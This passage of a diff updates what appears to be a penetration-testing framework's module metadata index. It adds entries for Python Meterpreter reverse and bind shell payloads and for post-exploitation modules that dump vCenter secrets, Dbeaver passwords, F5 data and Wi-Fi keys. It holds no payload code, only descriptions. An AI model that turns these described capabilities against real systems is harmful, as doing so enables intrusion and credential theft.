+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_socat_udp.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_socat_udp",
@@ -173627,7 +174805,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ssh.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ssh",
@@ -173662,7 +174840,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_ssl_double_telnet",
@@ -173730,7 +174908,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_tclsh.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_tclsh",
@@ -173765,7 +174943,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_zsh.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_zsh",
@@ -173835,7 +175013,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/bind_lua.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/bind_lua",
@@ -173871,7 +175049,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/bind_perl.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/bind_perl",
@@ -173907,7 +175085,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/bind_perl_ipv6",
@@ -173941,7 +175119,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/bind_ruby.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/bind_ruby",
@@ -174080,7 +175258,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/jjs_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/jjs_reverse_tcp",
@@ -185172,6 +186350,594 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "payload_cmd/windows/python/meterpreter/bind_tcp": {
+    "name": "Python Exec, Python Meterpreter, Python Bind TCP Stager",
+    "fullname": "payload/cmd/windows/python/meterpreter/bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre"
+    ],
+    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/meterpreter/bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/meterpreter/bind_tcp_uuid": {
+    "name": "Python Exec, Python Meterpreter, Python Bind TCP Stager with UUID Support",
+    "fullname": "payload/cmd/windows/python/meterpreter/bind_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "OJ Reeves"
+    ],
+    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection with UUID Support",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/meterpreter/bind_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/meterpreter/reverse_http": {
+    "name": "Python Exec, Python Meterpreter, Python Reverse HTTP Stager",
+    "fullname": "payload/cmd/windows/python/meterpreter/reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre"
+    ],
+    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/meterpreter/reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/meterpreter/reverse_https": {
+    "name": "Python Exec, Python Meterpreter, Python Reverse HTTPS Stager",
+    "fullname": "payload/cmd/windows/python/meterpreter/reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre"
+    ],
+    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP using SSL",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/meterpreter/reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/meterpreter/reverse_tcp": {
+    "name": "Python Exec, Python Meterpreter, Python Reverse TCP Stager",
+    "fullname": "payload/cmd/windows/python/meterpreter/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre"
+    ],
+    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/meterpreter/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/meterpreter/reverse_tcp_ssl": {
+    "name": "Python Exec, Python Meterpreter, Python Reverse TCP SSL Stager",
+    "fullname": "payload/cmd/windows/python/meterpreter/reverse_tcp_ssl",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "Ben Campbell <eat_meatballs@hotmail.co.uk>",
+      "RageLtMan"
+    ],
+    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Reverse Python connect back stager using SSL",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/meterpreter/reverse_tcp_ssl",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/meterpreter/reverse_tcp_uuid": {
+    "name": "Python Exec, Python Meterpreter, Python Reverse TCP Stager with UUID Support",
+    "fullname": "payload/cmd/windows/python/meterpreter/reverse_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "OJ Reeves"
+    ],
+    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker with UUID Support",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/meterpreter/reverse_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/meterpreter_bind_tcp": {
+    "name": "Python Exec, Python Meterpreter Shell, Bind TCP Inline",
+    "fullname": "payload/cmd/windows/python/meterpreter_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre"
+    ],
+    "description": "Execute a Python payload from a command. Connect to the victim and spawn a Meterpreter shell",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/meterpreter_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/meterpreter_reverse_http": {
+    "name": "Python Exec, Python Meterpreter Shell, Reverse HTTP Inline",
+    "fullname": "payload/cmd/windows/python/meterpreter_reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre"
+    ],
+    "description": "Execute a Python payload from a command. Connect back to the attacker and spawn a Meterpreter shell",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/meterpreter_reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/meterpreter_reverse_https": {
+    "name": "Python Exec, Python Meterpreter Shell, Reverse HTTPS Inline",
+    "fullname": "payload/cmd/windows/python/meterpreter_reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre"
+    ],
+    "description": "Execute a Python payload from a command. Connect back to the attacker and spawn a Meterpreter shell",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/meterpreter_reverse_tcp": {
+    "name": "Python Exec, Python Meterpreter Shell, Reverse TCP Inline",
+    "fullname": "payload/cmd/windows/python/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre"
+    ],
+    "description": "Execute a Python payload from a command. Connect back to the attacker and spawn a Meterpreter shell",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/pingback_bind_tcp": {
+    "name": "Python Exec, Python Pingback, Bind TCP (via python)",
+    "fullname": "payload/cmd/windows/python/pingback_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "asoto-r7"
+    ],
+    "description": "Execute a Python payload from a command. Listens for a connection from the attacker, sends a UUID, then terminates",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/pingback_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/pingback_reverse_tcp": {
+    "name": "Python Exec, Python Pingback, Reverse TCP (via python)",
+    "fullname": "payload/cmd/windows/python/pingback_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "asoto-r7"
+    ],
+    "description": "Execute a Python payload from a command. Connects back to the attacker, sends a UUID, then terminates",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/pingback_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/shell_bind_tcp": {
+    "name": "Python Exec, Command Shell, Bind TCP (via python)",
+    "fullname": "payload/cmd/windows/python/shell_bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "mumbai"
+    ],
+    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/shell_bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/shell_reverse_tcp": {
+    "name": "Python Exec, Command Shell, Reverse TCP (via python)",
+    "fullname": "payload/cmd/windows/python/shell_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "Ben Campbell <eat_meatballs@hotmail.co.uk>"
+    ],
+    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/shell_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/shell_reverse_tcp_ssl": {
+    "name": "Python Exec, Command Shell, Reverse TCP SSL (via python)",
+    "fullname": "payload/cmd/windows/python/shell_reverse_tcp_ssl",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/shell_reverse_tcp_ssl",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/shell_reverse_udp": {
+    "name": "Python Exec, Command Shell, Reverse UDP (via python)",
+    "fullname": "payload/cmd/windows/python/shell_reverse_udp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/shell_reverse_udp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "payload_cmd/windows/reverse_lua": {
    "name": "Windows Command Shell, Reverse TCP (via Lua)",
    "fullname": "payload/cmd/windows/reverse_lua",
@@ -185194,7 +186960,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/reverse_lua.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/reverse_lua",
@@ -185229,7 +186995,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/reverse_perl.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/reverse_perl",
@@ -185264,7 +187030,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/reverse_powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/reverse_powershell",
@@ -185298,7 +187064,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/windows/reverse_ruby.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/reverse_ruby",
@@ -205650,7 +207416,7 @@
    "needs_cleanup": null
  },
  "post_linux/gather/enum_commands": {
-    "name": "Testing commands needed in a function",
+    "name": "Gather Available Shell Commands",
    "fullname": "post/linux/gather/enum_commands",
    "aliases": [

@@ -205661,17 +207427,17 @@
    "author": [
      "Alberto Rafael Rodriguez Iglesias <albertocysec@gmail.com>"
    ],
-    "description": "This module will be applied on a session connected to a shell. It will check which commands are available in the system.",
+    "description": "This module will check which shell commands are available on a system.\"",
    "references": [

    ],
-    "platform": "Linux",
+    "platform": "Linux,Unix",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-01-24 11:22:19 +0000",
+    "mod_time": "2022-12-20 23:42:51 +0000",
    "path": "/modules/post/linux/gather/enum_commands.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/enum_commands",
@@ -205679,6 +207445,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
      "shell",
@@ -205820,7 +207595,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-08-09 15:53:58 +0000",
+    "mod_time": "2022-11-21 00:46:44 +0000",
    "path": "/modules/post/linux/gather/enum_network.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/enum_network",
@@ -205873,7 +207648,7 @@
    "needs_cleanup": null
  },
  "post_linux/gather/enum_psk": {
-    "name": "Linux Gather 802-11-Wireless-Security Credentials",
+    "name": "Linux Gather NetworkManager 802-11-Wireless-Security Credentials",
    "fullname": "post/linux/gather/enum_psk",
    "aliases": [

@@ -205884,7 +207659,7 @@
    "author": [
      "Cenk Kalpakoglu"
    ],
-    "description": "This module collects 802-11-Wireless-Security credentials such as\n          Access-Point name and Pre-Shared-Key from your target CLIENT Linux\n          machine using /etc/NetworkManager/system-connections/ files.\n          The module gathers NetworkManager's plaintext \"psk\" information.",
+    "description": "This module collects 802-11-Wireless-Security credentials such as\n          Access-Point name and Pre-Shared-Key from Linux NetworkManager\n          connection configuration files.",
    "references": [

    ],
@@ -205894,7 +207669,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2022-11-21 00:28:34 +0000",
    "path": "/modules/post/linux/gather/enum_psk.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/enum_psk",
@@ -205902,6 +207677,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
      "shell",
@@ -205987,6 +207771,54 @@
    ],
    "needs_cleanup": null
  },
+  "post_linux/gather/f5_loot_mcp": {
+    "name": "F5 Big-IP Gather Information from MCP Datastore",
+    "fullname": "post/linux/gather/f5_loot_mcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-11-16",
+    "type": "post",
+    "author": [
+      "Ron Bowes"
+    ],
+    "description": "This module gathers various interesting pieces of data from F5's\n          \"mcp\" datastore, which is accessed via /var/run/mcp using a\n          proprietary protocol.\n\n          Adapted from:  https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-getloot.rb",
+    "references": [
+      "URL-https://github.com/rbowes-r7/refreshing-mcp-tool",
+      "URL-https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/",
+      "URL-https://support.f5.com/csp/article/K97843387"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-11-29 17:52:23 +0000",
+    "path": "/modules/post/linux/gather/f5_loot_mcp.rb",
+    "is_install_path": true,
+    "ref_name": "linux/gather/f5_loot_mcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": null
+  },
  "post_linux/gather/gnome_commander_creds": {
    "name": "Linux Gather Gnome-Commander Creds",
    "fullname": "post/linux/gather/gnome_commander_creds",
@@ -206408,7 +208240,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-08-15 18:10:44 +0000",
+    "mod_time": "2022-11-22 11:55:47 +0000",
    "path": "/modules/post/linux/gather/tor_hiddenservices.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/tor_hiddenservices",
@@ -206429,15 +208261,20 @@
    "aliases": [

    ],
-    "rank": 0,
+    "rank": 300,
    "disclosure_date": "2022-04-15",
    "type": "post",
    "author": [
-      "npm <npm@cesium137.io>"
+      "npm <npm@cesium137.io>",
+      "Erik Wynter",
+      "h00die"
    ],
    "description": "Grab secrets and keys from the vCenter server and add them to\n          loot. This module is tested against the vCenter appliance only;\n          it will not work on Windows vCenter instances. It is intended to\n          be run after successfully acquiring root access on a vCenter\n          appliance and is useful for penetrating further into the\n          environment following a vCenter exploit that results in a root\n          shell.\n\n          Secrets include the dcAccountDN and dcAccountPassword for\n          the vCenter machine which can be used for maniuplating the SSO\n          domain via standard LDAP interface; good for plugging into the\n          vmware_vcenter_vmdir_ldap module or for adding new SSO admin\n          users. The MACHINE_SSL, VMCA_ROOT and SSO IdP certificates with\n          associated private keys are also plundered and can be used to\n          sign forged SAML assertions for the /ui admin interface.",
    "references": [
-
+      "URL-https://github.com/shmilylty/vhost_password_decrypt",
+      "CVE-2022-22948",
+      "URL-https://pentera.io/blog/information-disclosure-in-vmware-vcenter/",
+      "URL-https://github.com/ErikWynter/metasploit-framework/blob/vcenter_gather_postgresql/modules/post/multi/gather/vmware_vcenter_gather_postgresql.rb"
    ],
    "platform": "Linux,Unix",
    "arch": "",
@@ -206445,7 +208282,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-01 17:33:14 +0000",
+    "mod_time": "2022-11-19 10:33:31 +0000",
    "path": "/modules/post/linux/gather/vcenter_secrets_dump.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/vcenter_secrets_dump",
@@ -206457,11 +208294,10 @@
        "crash-safe"
      ],
      "Reliability": [
-        "repeatable-session"
+
      ],
      "SideEffects": [
-        "ioc-in-logs",
-        "artifacts-on-disk"
+        "ioc-in-logs"
      ]
    },
    "session_types": [
@@ -206995,6 +208831,53 @@
    ],
    "needs_cleanup": null
  },
+  "post_multi/gather/dbeaver": {
+    "name": "Gather Dbeaver Passwords",
+    "fullname": "post/multi/gather/dbeaver",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Kali-Team <kali-team@qq.com>"
+    ],
+    "description": "This module will determine if Dbeaver is installed on the target system and, if it is, it will try to\n          dump all saved session information from the target. The passwords for these saved sessions will then be decrypted\n          where possible.",
+    "references": [
+      "URL-https://blog.kali-team.cn/Metasploit-dbeaver-9f42e26241c94ba785dce5f1e69697aa"
+    ],
+    "platform": "Linux,OSX,Unix,Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-11 20:00:09 +0000",
+    "path": "/modules/post/multi/gather/dbeaver.rb",
+    "is_install_path": true,
+    "ref_name": "multi/gather/dbeaver",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter",
+      "shell",
+      "powershell"
+    ],
+    "needs_cleanup": null
+  },
  "post_multi/gather/dbvis_enum": {
    "name": "Multi Gather DbVisualizer Connections Settings",
